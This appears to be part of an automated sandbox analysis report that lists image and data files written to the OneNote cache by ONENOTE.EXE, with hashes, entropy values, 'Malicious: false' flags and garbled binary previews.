Preview:	2...>.......T...v...H...................................................................................................................................2...>...0.......v...\|............................I.......I.qk..B.....LZ1.......1..j.1..5S?....1..j.1..5S?....1....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............{..#..f.".<...v.....N...^.....................PD.WC.............f........................................I.qk..B.....LZ............{..#..f.".<...v.........{..#..f.".<...v..........1.......1.......1...........................................1..j....1..T.]..1.......1....B..1..H....1....B..1....>.)1....J...................;........4...4...4.."..............1...1...1....z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4.........1.......1......#1..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007T.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 30 x 700, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	1547
Entropy (8bit):	6.4194805172468286
Encrypted:	false
SSDEEP:	24:dZeDNYbS+238CTUFPA6SXG5qSacX9q73eXu0vC3dU+OB2gbwHRuZ:dykp9FzBBacXQ3uNC3n7xuZ
MD5:	0BA36A74DFBF411FAB348404CCEC3348
SHA1:	4C619790E517416E178161028987DF1CD3B871CC
SHA-256:	2E7AAF26BEC32148B96442E8FFF1BD2CEF2D72630969F23B9A2ABEDB6CFEC93B
SHA-512:	90AF53DB7C413E2ADB970AC345F73E4ED8AF626E179C929E6560118F7A9E98DC7C5FF02B2B3F6C98D397E0FE2D85F3427C6928C328872149E176FA8A99E91F54
Malicious:	false
Preview:	.PNG........IHDR...............\....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................D......bKGD....H....cmPPJCmp0712....H.s.....IDATx^.WSTA........b.0gPPP0..E.9b@L(.c.N.U>..@......;...}..B.(....$......5..XS...I....).!....D^.uE...\..5........F."o..-...m.n. .^.....q= .

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007U.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.314679629287676
Encrypted:	false
SSDEEP:	48:CsTyPmF83zJthnE05zejmXQpyP9GKUIypyhrdMr7ZH3fWFXvFamYhAd:CshmzJDEGXys9GtBERMEH+A
MD5:	BBDF8A0155CB3535AEB89539CB51B956
SHA1:	BB86FF551D2991D1BCBB004F28A38FDBA602E09E
SHA-256:	F445C717F4A59BF10091D6BECD3BC40A2817CF375FCC42B6BFC75DC9A31384D2
SHA-512:	2AC30DF74A9A6D9D161F168E2F911328C7DA7122DE143F20BE170C8F806C095F40372303AAF9AE93691A906F506091C5DE4FDF23CAD56A20728F1368BD2859F0
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>..........v...v............................I.......I.qk..B.....LZ.a.......a.C.......X.y.a.a.C.......X.y.a.a...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............K.8I.......(;....N...^.................~...NL..]..h........f........................................I.qk..B.....LZ.............K.8I.......(;.........K.8I....*...(;..........a.......a.......a...........................................a.j.....a.T.]...a.......a...B...a.H.....a...B...a...>.).a...J...................;........4...4...4.."...............a...a...a...z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4..........a.......a.....#.a.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000007V.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	95763
Entropy (8bit):	7.931689087616878
Encrypted:	false
SSDEEP:	1536:EoES7mhTyzabUaE77xAOmq0zVruQlttNxlipxVWssMU2YhRy2v6pKKYhQzwMc2:zz7mhTyzabUa4b4xuQlttnlGx8x9h02M
MD5:	177DD42CA99CAA2CCBF2974221680334
SHA1:	35FD86B3DD082A6D4930C67BC0E05D3B5817465A
SHA-256:	525A857D0EDA855A64D3619DF58B1C2D013A73E60FA0D49B155ECFCB2C134C7C
SHA-512:	6FB6D9A6C97B1115C3246690A2F339CD612899AC25ACBA00296EAEAA0A1D094E7339D670969764FE23EB7C08FCDD01C6F78FBC0735D504D5E02AD342901719B3
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!..1AQa...q......."...2..B#Rb3..r$...6..C4....Ss%5...tu.c..Dd.EU7....................!.1.AQ..aq......"r..2...4Rb#3$B.Ss............?..H..dV....U..-..0]Cp.%O.Z.Y.e.=/.q.....j76.w@s...5.&&&5...n..w..>.1....;.vR..[.......=.......KtY]u3.g18...).r....&.IZ'.....g..4kY..X..b.......y<...r1........e.._...X...w....op.m%Jr31...S.Vo.._....OI\]....F..V-....\...2j..X.....y.p.$4.....&#..]..n.V..x..P...F..C.f....])..~..Z\.....,..#..v..v...2V.k.SuaydO../[.c._..oTV<Z.s.[...o.x..>....-....v...#....-.X..L.Z./#.XG.-.0......%w..H.@aZ....C.}...N~.;..R......5.D......I.... .R........s.>..ks....(...S...9....2=. :^.. p.+?(....$..Q..I.........=\|..`2. v..t......U.8.u.. ...'...*...2;u....& 3..$.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000080.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.340763741610726
Encrypted:	false
SSDEEP:	48:WsnYheEg7tB3/uEyLgFTXEQ9JUipyhrdMrC/LFXQxTI4CFN0ll:WsweEg7yEy05Xb9ai0RMY6ibN0l
MD5:	B03E05E6073446C560786F833B92F56C
SHA1:	6B33ADEA433965A9BDC025A1C8BF0DB2B78F2437
SHA-256:	E9D4B864FB64E39ACC116C2D7391E75D1C6D9D19BA2F56BF69C859377DC617F2
SHA-512:	7FB46BFB1A04BD53003CB7022F789C2B54CF5071FE303B82E523D7993AD32862A618455A5A7835C9BB874F995EDCA646FECB60C9983BAE9A53D40DCA79A3C85E
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>..........v...v...........................M[......M[...y..........I.......I.qk..B.....LZM[...y.........M[...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............A.1..%@..h.......N...^...............7.....D......3.........f........................................I.qk..B.....LZ..............A.1..%@..h.............A.1..%@..h............M[......M[......M[..........................................M[.j....M[.T.]..M[......M[...B..M[.H....M[...B..M[...>.)M[...J...................;........4...4...4.."..............M[..M[..M[...z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4.........M[......M[.....#M[.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000081.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	67991
Entropy (8bit):	7.870481231782746
Encrypted:	false
SSDEEP:	1536:3PC0XJjsmsKuZRG1pXuZ6z3wARnV9AEnieCc7cllJcHJ:qyMBzkUZ0gq25c7Z
MD5:	1271B1905D18A40D79A5B9DB27EE97EA
SHA1:	9618608FBD7342DE6C71220A36C3F4995BA9C13E
SHA-256:	5B321A4D81BD499B289B1755F6450A42047C494DFBC112DBD56DA4CED2C15C1A
SHA-512:	C32DD26047F6B8AA061085B38AC2B8335868E1BFD8731DB65544309223A955FA4BF45B06AC8D244408658F51A1775B6F19FF0FFC804989DE706DE8EB36F1436F
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1..AQa..q..".........2...BR#b.r.3...$.'...)..C%7gw..(.S.W89.......................!1.A.Qa.q".....2...#....B.t......rc.$%67Rb3s&'CUu.v....S.d5.V4T.e.............?...?..Wj.e.e.......w/..E..eOw_.....6......u..C6h.,..;.g.D8Z..-)O..jy..e;.u.g..w..[.L""k'w.......'1'.[......=..P...S.9a.V./O....q=8xk]...........9......F...e9'....9.O.... .&.....p......c.4...mr...?.......L..'.....0....+..\|_...POM=7.?.2.a....};.Z..y./....>./.C.<...;.....\|.1>...........S.8.o.O...+..n2...k../.X..9...Y...:.....\...Dk......q.K..\.Wuh.!Z?.mu...R.5.A.S.h.0..[..v..+M.....aUi.k..?#..._...X..R.&]..[..;../]L..f..V.......e...ut&.#.J.5....c%..o.$..v.<K.6..T.IP.....6X.*.uf..t0^..-.)m$.!.q(.j.f;..WB6.b.B..R.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000082.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.343264298707097
Encrypted:	false
SSDEEP:	96:wsW1PfOGfEdnXaz9CtYRM7EE5DRLGSgLD/SC:wsafmdnXaz9yYRM7v9
MD5:	3985315A42285AD705FA8D506F847382
SHA1:	F534C719A910B3EA8477400B409F5D698B4A6A66
SHA-256:	800B4A8F97EDBFCB98263344D186BDC970770340CA76863D7B426F83A3F0E4A1
SHA-512:	7D3FCCE957B6F032235C652A5CF32E70937304920708C851DD4A05704953B8F847C58AC56BF02D8AAA459B5C0C89101C53CAAE21A872EB400E9CE87AE4ECC116
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZLR......LR.t.....9p.m9KLR.t.....9p.m9KLR...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............F.4.....D[..\|.....N...^...................o.yF.../N.U.........f........................................I.qk..B.....LZ..............F.4.....D[..\|...........F.4.....D[..\|..........LR......LR......LR..........................................LR.j....LR.T.]..LR......LR..B..LR.H....LR...B..LR...>.)LR...J...................;........4...4...4.."..............LR..LR..LR...z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4.........LR......LR.....#LR.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000083.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
Category:	dropped
Size (bytes):	22203
Entropy (8bit):	6.977175130747846
Encrypted:	false
SSDEEP:	192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
MD5:	2D3128554F6286809B2C8E99DE5FD3F6
SHA1:	FC42CB04151D36F448093BDEFE33031A9B8D797D
SHA-256:	14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
SHA-512:	D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
Malicious:	false
Preview:	......JFIF.....H.H.....XExif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&..................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000084.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.448270304337366
Encrypted:	false
SSDEEP:	48:3RZ1pZ1psLKG12kNIiMtt9E15LZBX8q9JUzpyVrdMruUBEX2FXthkB7Mg:3RVVsRIkNIiMZEDTX79azYRMxT+M
MD5:	340325447A0FF361DDF53376C3EA0F20
SHA1:	05DB5363EC13F62A9870EB5753537BD0C170B7F1
SHA-256:	75C95587541EC27FBD316B95AE1AC43CAB8752008C4C37693402131F8AA1B0C7
SHA-512:	57173C59023D234BF629C8D76F1D56102E7B59B72B87A9AF7B3DE6A9290FA358387E673311F12D70CDE92C049EDECEE935399151C6516463127DAAB5FC049DA5
Malicious:	false
Preview:	2...>.......l...v...`...................................................................................................................................2...>...H.......v................................I.......I.qk..B.....LZ$!h.....$!h7]W.....Y1...$!h7]W.....Y1...$!h..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............ViC.i;.... .Q......N...^...............Y...9.@A.k.[.(%=........f........................................I.qk..B.....LZ.............ViC.i;.... .Q...........ViC.i;.... .Q...........$!h.....$!h.....$!h.........................................$!hj....$!hT.]..$!h.....$!h..B..$!hH....$!h..B..$!h..>.)$!h..J...................;........4...4...4.."..............$!h.$!h.$!h..z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4.........$!h.....$!h....#$!h............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000085.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	15740
Entropy (8bit):	6.0674556182683945
Encrypted:	false
SSDEEP:	192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
MD5:	FFA5EC40DC9A0FD10EB9E6355142D6A6
SHA1:	3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
SHA-256:	D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
SHA-512:	6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.\|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000086.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.345048837783603
Encrypted:	false
SSDEEP:	96:KsZmAIL/CEjx/XXr9CWYRMEkfws8m5NX86C1:KsZmAILHjx/Xb9lYRMRwk
MD5:	51B74111B496D2C23F5195A232765F2D
SHA1:	9299B0B00B308A632053BEC9D3F2A31BEFFE87BC
SHA-256:	B35B63723056CCE329272667E8ECBA1152DC7E9016DF8A7D7C4C6179860ADA98
SHA-512:	2F6A67309DC6102D036D7647468DC291035F92EF6B354D77C377324646D40E2D16C689FE47A7583774B1FC1C6945698D1C58FC3F69DC6694D0A13F35A9E5C7CB
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ./....../Wj...5...:..../Wj...5...:..../..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............j.@...qQ..T.....N...^.................x...YN...m...J........f........................................I.qk..B.....LZ..............j.@...qQ..T...........j.@...qQ..T.........../....../....../........................................../j...../T.].../....../..B.../H...../..B.../..>.)./..J...................;........4...4...4..".............../../../..z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4........../....../....#./............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000087.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	86187
Entropy (8bit):	7.951356272886186
Encrypted:	false
SSDEEP:	1536:AbmHwD7za0syWMetp3TdPFzoJamVdAQZCiUit9qbYN6LerhWMzIWgN1EeaYhJM:1QnzsyTeP3TPAdAQZCi5qbYEKrhWWMNO
MD5:	FEE4785DF76E93A9DC2F4501CBAEAE12
SHA1:	8FB4527BDE05EF208FCDB168098A07707C27501F
SHA-256:	F091DED5E283AF6848670A3172E7C43C6099875D39B3FC69C2BDBA914F609602
SHA-512:	7E99D33151A0D3873D6A819C98EA8E62D928C087B7BA2080F11C7BCF746AD60A44D4FF6EE3D2D2E8DFA4BF1FC6285ED56BB83F91C2FC6FC4FDFF2000105F10B1
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................1.!Aq...Qa."...2..BR#...br......6v.7..3.CSc...$4.s..&dt%u.f.......................!1.AQ..aq........"2.B#....Rb3..t.5u.67.8.r..$....C4.cs.Sd%.DEUe&.............?............w.....c.....i.A.....3...7.......7..P......%.........?Th..l./?.;.....$}..=5Oa...F.c.A/...D.D..]..y..3e.5\%.fo2.X.]q.5Ee.}..i..md.T....#...-...Mu...9...-+..~w5O.);..G..'.;..).....A_...M.vV..y.q......,<.3.(...._K:..XM.......w.......9..T.......?b..a-%.c;.}..>....\|.,lZKCEB.t...fw\|.Sw^..Y..:.J.................t._P..v..j.1.R8.R....G..WH<(Xi........i..xcu...WM.dqM>'W..g....M.q.....+.....b'..~....>..T.~Jc....fj.X.x..9...N.w.6:..>.......&.(h..u...t._...)_k#7Za...cZ....P...Y..;.V.,..xo.....f........Y...\6...M'L._

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000088.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.660376540018292
Encrypted:	false
SSDEEP:	96:EsBTgI4XEtUqJ0cXDc9CacRMk0lRGMtolH+Sd:EsBTgX0KaRXA95cRMk0lRGMtoleSd
MD5:	9F009C4A6E3DBDA102D71C26A462BDD0
SHA1:	B3AAACB4B99BF7F56086CB0DA5D095B8B240AFE4
SHA-256:	7899D67BBA9135D53E069A4041A64D3C1D9259AD8214F10AD49A1C4E59624E15
SHA-512:	DBD4B736205D4E79F68329E59CC923176FF0894CF6D4A04E20C8ACBD6B8A88C5B2A6F76518B270A50314FD3DF41F93E58B1AE3806AB64BAE13620911D9441151
Malicious:	false
Preview:	2...>...........v.......................................................................................................................................2...>...t.......v................................I.......I.qk..B.....LZ...........([...&m;vC. ....([...&m;vC. ......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............O...fIW.+./........N...^..................&...D.......I........f...................................H....I.qk..B.....LZ............O...fIW.+./............O...fIW.+./............................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000089.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 85 x 470, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	11197
Entropy (8bit):	7.975073010774664
Encrypted:	false
SSDEEP:	192:p9wNdtRKcVHso6zsqm06xaqZdingVzLZ7/PGSIz/yycRTbChh/JzhbEx15RGb:mdtMcVHqgAqTinMzLZ7/uSIz/yTR/mhF
MD5:	DDC3CC30794277500EFE4BC6667EC123
SHA1:	EFC9642C1F95B5FC38764476AE481649C016FA0C
SHA-256:	7F5B660A1A0BF46C75AAF19B4F77A0E086DE003EC03AFC1F58D871D55AA5BA9E
SHA-512:	25232A84604C3959634D33090238FEC8D51E40AD84EB3A08BB8522A81BE1E83378649C014E98E1DFCDF46B7BFAC92D8D2429211CD11D7EE0334C9C3DF7C1B6A6
Malicious:	false
Preview:	.PNG........IHDR...U.........1x5.....PLTE....................................e........................................................s...............x..........................o..............................................................................................................................................................~.............................m...............................................j...............................................p.......z......................................................x..............\|........................................v.......................y..........................................................h...........................................................................P..{....bKGD....H....cmPPJCmp0712....H.s...(SIDATx^.}i@S..N....h...!..)....AI%..p.L."a..)..`U..,h..:O.b.:.j+.Z).b..zN.s..{O...&\|..N}...${....~.....k}.[k}{.o^.D_..W:35ly..7rL....6n0.A...b

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008A.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.334951732626413
Encrypted:	false
SSDEEP:	48:dosRwTUSKyMLtKlMuElLuQXtB7z9dUodpyVrdMrCUedFX6sRlGtS9nxJ1FASECRY:dosOMLSEl/Xrf9eK4RMQHR//CCRQ10
MD5:	B8C501417D1D35E2D42E5FA1F1F83F30
SHA1:	8658A5579D0F3E1D5A23C99E471A11C83BD78AEC
SHA-256:	868393228CA0E234447E2EE7BA1311F9F63B9EF692509AC0158C5CA4BB5A4B1C
SHA-512:	F3D9ED45EB7579E3652210016CAE5D3D6F1306520A02A0212BFFCA12CB8AF3CC2AD554EFB697A26EBCB93E78700658FD17FE1F1FD8BCC020B49CC2DD6D36904A
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ6.......6...]...'....A..6...]...'....A..6....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............Y<Y....'W..........N...^...............S.?A.I.H.y...v).........f........................................I.qk..B.....LZ.............Y<Y....'W...............Y<Y....'W...............6.......6.......6...........................................6..j....6..T.]..6.......6....B..6..H....6....B..6....>.)6....J...................;........4...4...4.."..............6...6...6....z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4.........6.......6......#6..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008B.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 88 x 574, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	19920
Entropy (8bit):	7.987696084459766
Encrypted:	false
SSDEEP:	384:DRSgtAxJx7bzvAsVSqQElOT4uHmpmvNYT9aPU+QtsC2LgfIqJZnbeyRB:DsgaN7bzvAsVdK4uGQFUZ6bU/p3
MD5:	1BDAD9B3B6DE549162F9567697389E1C
SHA1:	5D9C09159F07A3A9BDCC6C4B9BD9CB72D0184E6F
SHA-256:	0908A4CFA23F93011176D47F45843E9CA2973030421996E8E27484781F54B0EC
SHA-512:	475040779AC247BB5C3E11862FB55FBDDFA12D759EE86A33E11BC1F3B656D6CD0F9B25146C0113E43E1D8001D8867D3BC3BF7E6FE21F3A0016CB1F8B70B7A15A
Malicious:	false
Preview:	.PNG........IHDR...X...>......y=h....PLTE..................................t........iw..............................................._n\|...Tds...ky......................................................p~.....................................................dr.................v.............................................n{.......ap}..........x.....z...................u......................\|..Vfu............r.....w........................................~...................Zjx...................................Yiw............w..\|....................Xgv{.....y...........................jx..............\lz.........}..z.....t..[ky........u..y.....gu................................{..........}.....u....................~...........y....r.....bKGD....H....cmPPJCmp0712....H.s...JfIDATx^...\.W./.}....Sy...(..4....D.-.....H...% .$"D.Qr.......`..;...6...N......s...^...L.....Y{.GQU`..~...j....{...-Ax.K..&.....F..I\i..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008C.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	2.9180656283213158
Encrypted:	false
SSDEEP:	48:Zs7QBPhYtZs9iE1LN9NVSL6Mhw3XnWFV9RrsdpyFrdMrHfNvFXlVzyDS4p:Zs8lhYrUiE1fN0fEXoV9hIIRMHFvs9
MD5:	688DE4DBFA54EC5706BD914CC5944E21
SHA1:	9668B57FD3A06A9F5D9D78086176AB9E4E8B829E
SHA-256:	0EFA14F958E385AEC22290EB52D4AD8ABA39855A4CE75C6757E1BE142472CB95
SHA-512:	4F1404DAE29E21763470A6F7ADA4B4F36AB5BD20AF46830BFBDD2857C0B1F9F2A0CD3D3B599C461C6EFE82FEF48008C993A78BED26DDD760193BB1B08CED1E05
Malicious:	false
Preview:	2...>...........v.......................................................................................................................................2...>.......H...v................................I.......I.qk..B.....LZ.(......(7.ru.".cHQx...(7.ru.".cHQx...(..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............F.......'..:k.....N...^..................a..A..B..T..........f........................................I.qk..B.....LZ.............F.......'..:k..........F.......'..:k...........(......(......(..........................................(j.....(T.]...(......(..B...(H.....(..B...(..>.).(..J...................;........4...4...4.."...............(..(..(..z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4..........(......(....#.(............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	179460
Entropy (8bit):	7.979020171518325
Encrypted:	false
SSDEEP:	3072:oiKXvL7lv0am/R1vrdH+9dK6zPQ6bbnGDpcGGDNMIOIMAT8q9Vc02Q57S4A+vMFz:+vlvC/HvgA6fGqGGJlO1qZ71W6CzDn
MD5:	4E131DBFEC5C2462273CA7B35675B9D9
SHA1:	CA037F444D819A118AC37D7AA3782B9BF94C1616
SHA-256:	2A4A3530D652E227DDD5ADC096A95F6034718F7C380B07DB622022D768815059
SHA-512:	C333ECEB1439D0238BF44FB7896E62DBA4C645B70413AA0F99C1F10E8DCD20C2EEE5C83F2E9DDE9A2494C85A6D8D13CFFFC4160E2F598E17867015F5244D656A
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1AQ.aq...".....2Rr..Bb..#34.....CSs.$5c.t....%.Dd.6.T..u.U....E.7w........................!.1A.Qaq......2."r.3....BRb.#4......CsSc...$.5..%.DT.t67d..Uu...'............?..c.......p..z..i.....z......kj........F>f......3N...M....RM.&..-.~.Q..'.....q.a..w...-~......g.{..&.......V.n.D....>FS!n.....@..)...W..q..Wr{..J.gf.{.M$.P@m.,..9..&m.D...w.._...-.O........s.....h.k~......(.K...V..l.-...+.9.k............#.p#.O..9M..mF...C.......7+.AI....4vw.;..H......e..Q.u[.eUK.....z.....[.Kt...s..Lf.4..l{.....sh.............=..;..iqkj.m.a...NH......v..H..$..q.y......c...U[Mcf.......+...S-...^....4..T..YtL.x.v.;.....<...Ik\|B.$.s8......3.+.8.l.. h.:....%B..W..I.QRS..,x.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008E.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.303699409256024
Encrypted:	false
SSDEEP:	96:dRKsuqfyXOJr+SlEX2E0Xh9N3QRM1PefEzwWPY:dRKsuqfWS+SM0Xh9N3QRM1PefEzwW
MD5:	5E9E2E9E4D634C226F2B434C2FB0077F
SHA1:	C6FC7A1E39EB8813AB1A0C4F6FADA394412A6245
SHA-256:	6F3B84E4C03120C712626B844306B96375966D7AFFC057E87F9A0746BF27B4F9
SHA-512:	A5E1FD647D0B5A72856659AAD2120C3DF448E0EFE5BBE2BA3EB93D8A58968C07DA6CE98221701AA8DBB789AD865133F266653FCE84912233BDC279B1D0EA7563
Malicious:	false
Preview:	2...>.......T...v...H...................................................................................................................................2...>...0.......v...\|............................I.......I.qk..B.....LZ.@.......@.nx............@.nx............@...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............Q8..\|W<...=.>.b....N...^................E@9.x.O..[/.~Ql........f........................................I.qk..B.....LZ............Q8..\|W<...=.>.b........Q8..\|W<...=.>.b..........@.......@.......@...........................................@.j.....@.T.]...@.......@...B...@.H.....@...B...@...>.).@...J...................;........4...4...4.."...............@...@...@...z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4..........@.......@.....#.@.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000008F.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	109698
Entropy (8bit):	7.954100577911302
Encrypted:	false
